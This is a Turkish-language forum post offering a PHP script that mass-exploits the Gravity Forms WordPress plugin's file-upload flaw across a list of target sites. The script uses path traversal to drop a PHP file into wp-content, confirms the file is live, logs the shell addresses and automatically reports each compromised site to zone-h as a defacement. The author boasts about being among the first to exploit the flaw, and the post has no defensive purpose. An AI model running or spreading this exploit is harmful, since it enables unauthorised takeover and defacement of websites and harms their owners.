merhabalar ınput acıgını yani wordpress eklentisi gravity forms olan

 ilk cıkdıgında sömürmeye başlıyanlardan biriydim daha dogrusu o zamanlar zone-h da sadece 3 kişi sömürüyordu bu ilk 3 kişiden birileride bizdik neyseki aradan gecen günlerde arap kardeşlerimiz exploiti kodladıkları gibi public eddiler SAGOLSUNLAR  bendeki exploit ise sadece post girdileri hariçinde diger tüm kodlar tarafıma aittir görüldügü gibi saten oto zone-h kodlarını koyarak otomatik post ettirmeyi saglıyorduk public edenlerinde bu özellik kimisinde yok denilenecek kadar az
kullanım exploit calışdıgı dizine up.gif adında bi txt veriye hacked yazsanız bile yeterli saten exploit içerisindeki nickleri kendiniz degiştirirsiniz zone-h dan kayıt alınmadıysa kendisi alır
ÖRNEK:http://www.zone-h.org/mirror/id/24360597

PHP- Kodu:
<?php /** Coded by DARKWAR2 **/ $ex=file($argv[1]);
echo 
"\n\t Toplam siteyi ver babana: ".count($ex)."\n\n";
for(
$i=0;$i<count($ex);$i++){ $link[$i]=strtok($ex[$i],"\n"); $zz=trim($link[$i]);
 
$post=array("file" => "@up.gif""field_id"=>"3""form_id"=>"1""gform_unique_id"=>"../../../../""name"=>"up.php5"); $url="$zz/?gf_page=upload";$ch curl_init($url); curl_setopt($chCURLOPT_POSTtrue); curl_setopt($chCURLOPT_POSTFIELDS$post); curl_setopt($chCURLOPT_RETURNTRANSFER1); curl_setopt ($chCURLOPT_FOLLOWLOCATION1); curl_setopt ($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($chCURLOPT_CONNECTTIMEOUT10); curl_setopt ($chCURLOPT_COOKIEFILE,getcwd().'/cookie1.txt'); curl_setopt ($chCURLOPT_COOKIEJARgetcwd().'/cookie1.txt'); curl_setopt ($chCURLOPT_SSL_VERIFYPEER0); curl_setopt ($chCURLOPT_SSL_VERIFYHOST0); $res curl_exec($ch); curl_close($ch);

                
$dr2="$zz/wp-content/_input_3_up.php5"$gett=@file_get_contents($dr2);
if(
preg_match('/DARKWAR2/i',$gett)){
    echo 
"\n[+]Exploit Done \n[+]shell : $dr2 \n\n ";
     
$dt fopen('veri.txt''a+'); fwrite($dt"$dr2PHP_EOL); fclose($dt);
    
$ch3 curl_init ("http://www.zone-h.org/"); curl_setopt ($ch3CURLOPT_RETURNTRANSFER1); curl_setopt ($ch3CURLOPT_POST1); curl_setopt ($ch3CURLOPT_POSTFIELDS"defacer=DARKWAR2&domain1=$dr2&hackmode=1&reason=1");
if (
preg_match ("/color=\"red\">OK<\/font><\/li>/i"curl_exec ($ch3)));


           
            } else {
        echo 
"| ".$zz " : No HACK \n\n";
    }
}
?>